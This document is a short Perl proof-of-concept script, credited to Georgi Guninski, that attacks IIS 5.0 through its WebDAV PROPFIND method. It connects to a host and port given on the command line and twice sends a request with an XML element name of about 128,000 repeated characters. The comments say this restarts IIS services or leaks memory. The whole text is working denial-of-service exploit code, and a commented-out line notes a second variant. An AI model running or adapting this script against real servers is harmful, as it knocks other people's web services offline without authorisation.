#!/usr/bin/perl
#                                     Written by Georgi Guninski
# Description:
#
# It is  possible to  remotely  restart  all IIS related service
# using  specially  crafted  request.  It is  also  possible  to
# force  IIS to  consume memory  which it does  not free.  Seems
# to be a buffer overflow, don't know whether it is exploitable,
# let me know if you find a way to exploit it.

use IO::Socket;

print "IIS 5.0 propfind\n";

$port = @ARGV[1];
$host = @ARGV[0];

sub vv()
{
  $ll=$_[0]; #length of buffer
  $ch=$_[1];
  $over=$ch x $ll; #string to overflow

  $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
  #$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop><a:displayname />'."<u:$over />".'</a:pr
op></a:propfind>'."\n\n";
  # ^^^^ This is another issue and also works with length ~>65000

  $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop
></a:propfind>'."\n\n";
  $l=length($xml);
  $req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
  syswrite($socket,$req,length($req));
  print ".";
  $socket->read($res,300);
  #print "r=".$res;
  close $socket;
}

do vv(128008,"V"); # may need to change the length
sleep(1);
do vv(128008,"V");
print "Done.\n";